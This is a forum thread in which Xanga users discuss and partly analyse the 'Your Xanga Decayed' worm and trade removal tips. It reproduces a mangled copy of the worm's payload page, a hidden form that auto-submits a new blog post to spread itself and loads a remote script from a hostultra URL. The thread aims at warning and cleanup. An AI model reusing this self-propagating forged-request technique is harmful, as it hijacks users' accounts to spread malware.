Okay..see this i why i said dont click it..

the problem is, my xanga has no module and even if i have it, i still won't dare to click any of my friends' xanga for now....

I had it, I got rid of it, all u need to do is:

1.sign in under safe mode
2. delete all of the entries that have that code

it really easy to get rid of it after you no how to get rid of it...your friends are nice people who need your help.

as long as your not signed in, you wont get the virus

with some help....

Okay... this is as far as I got...

This hacker created a script that he would assume most of you can't recover from. His assumption is correct to an extent. The hacked site would say "Your Xanga Decayed" and just about every comment has been converted to a random float value. If you see "Your Xanga Decayed" which you really shouldn't, that means you don't have javascript on. But if you don't have javascript on, you wouldn't have been infected. The virus will also open a site to hostultra with decay.php. This php file will record all those users who have their site "decayed". This keeps a record by having a random integer given to each user making each user unique to the database the decay.php is logging to. As far as how the infection works, it probably won't work with the decay.php gone.

Thanks, this is very informative. But my question is, is there anyway that we could contact people from xanga and ask them if they could get rid of the virus as a whole from the xanga community?

huh??

besides that, you very accurately described the virus. also, if you are logged on, the script redirects you to "new weblog entry", and creates a post that will spread the virus, and contains the words "your xanga decayed".

There has to be a way to contact the Xanga people, this is really not cool. I wanted to upload my new theme today, but now I am way to scared to even go to my xanga..

forget what I said about the javascript.
do you actually see a "new weblog entry" being opened? or do you see that from a source code, if it is I'd like to see it too :D

it's in the source code. i looked.

here is the code for http://free.hostultra.com/~decay2/decay.php (DON'T CLICK THAT LINK) ...it's long

<script language="JavaScript" src="/root/hostultra.php"></script>
<title>Decayed</title>
<center><font size=7>YOUR XANGA DECAYED</font></center>
<form name="myform" method="post" action="http://www.xanga.com/private/xtools/xtoolsclassic.aspx?plain=1" id="_ctl3"><input type="hidden" name="__VIEWSTATE" value="dDwyMTM3MDU0NDg2O3Q8cDxsPFdlYmxvZ0lkO0lzUmljaFRleHQ7PjtsPGk8MD47RmFsc2U7Pj4
bDxpPDI+Oz47bDx0PHA8bDxvb script: return XagazonSearch()" type="button" value="Search »" style="DISPLAY: none" ><input name="xztitle1" type="text" id="xztitle1" style="DISPLAY: none" /><input name="xztitle2" type="text" id="xztitle2" style="DISPLAY: none" /><input name="xzasin1" id="xzasin1" type="hidden" size="2" /><input id="radAccess_0" type="radio" name="radAccess" value="1" checked="checked" style="DISPLAY: none" /><label for="radAccess_0"></label><input id="radAccess_1" type="radio" name="radAccess" value="2" style="DISPLAY: none"/><label for="radAccess_1"></label><input id="radAccess_2" type="radio" name="radAccess" value="3" style="DISPLAY: none" /><label for="radAccess_2"></label><input id="chkComments" type="checkbox" name="chkComments" checked="checked" style="DISPLAY: none" /><label for="chkComments"></label></td><input type="text" name="btnSubmit" value="Submit" id="btnSubmit" onclick="flag=2;Send();" style="display:none" />&nbsp;<input name="btnCancel" id="btnCancel" type="button" value="Cancel" onclick="var x=confirm('Are you sure you want to cancel this post?');if (x==true){flag=2;window.location.href='/Private/home.aspx?user=';} else return false;" style="DISPLAY: none" /><input name="txtUserId" type="text" value="1865377" id="txtUserId" style="display:none" style="DISPLAY: none" /><input name="xbgcolor" id="xbgcolor" type="hidden" /> <input name="xbordercolor" id="xbordercolor" type="hidden" /><input name="xcontent" id="xcontent" type="hidden" />&nbsp;<input id="xcopypost" name="xcopypost" type="hidden"></form><script>document.myform.submit();</script>"));

whoa.. very long indeed. But now what?

why doesn't the person who made this topic edit their first post saying not to click on it or you will get infected?

There's the magic. That doesn't open up the new web blog entries. That fakes a form of the new web blog entries and automatically submits a new web entry. There's an easy way to prevent this script from working if Xanga haven't already figured it out by now.

DON'T CLICK IT YOU FOOLS

the 1st person fixed there xanga....it wont spread

everyone keep posting and keep this updated a few of my friends got it and im helping them i need some more info to try to stop this thanx

i noticed something strange... before, the decay thing was at http://free.hostultra.com/~decay/decay.php but now it's at http://free.hostultra.com/~decay2/decay.php (DON'T CLICK THIS LINK). I guess hostultra deleted the ~decay one, but how did the virus code change so that it began linking to ~decay2 instead?

P.S. - If ~decay2 gets deleted too, the guy will probably try to make a ~decay3. however, that wont happen. i made a screenname there called ~decay3 already XD

LOL!!! they'd just make a decay4 !!! lol

lol i dont see how that will help they will just skip to 4

exactly what i said!

It'll still spread. Worms don't work that way.

As far as spreading is concerned. Please help the community.

Add this to your Headers:


This prevents others from infected. Not you. For the time being you should visit sites not logged in or with javascript disabled to prevent infection.

lol sorry we posted at the same time haha

I got it too by trying to randomly prop people out of the goodness of my heart. This is the lamest thing ever. I just got it looking all prettifed. S o is there a way to fix it or not? And can the xanga staff fix it theirselves?

happens to everyone!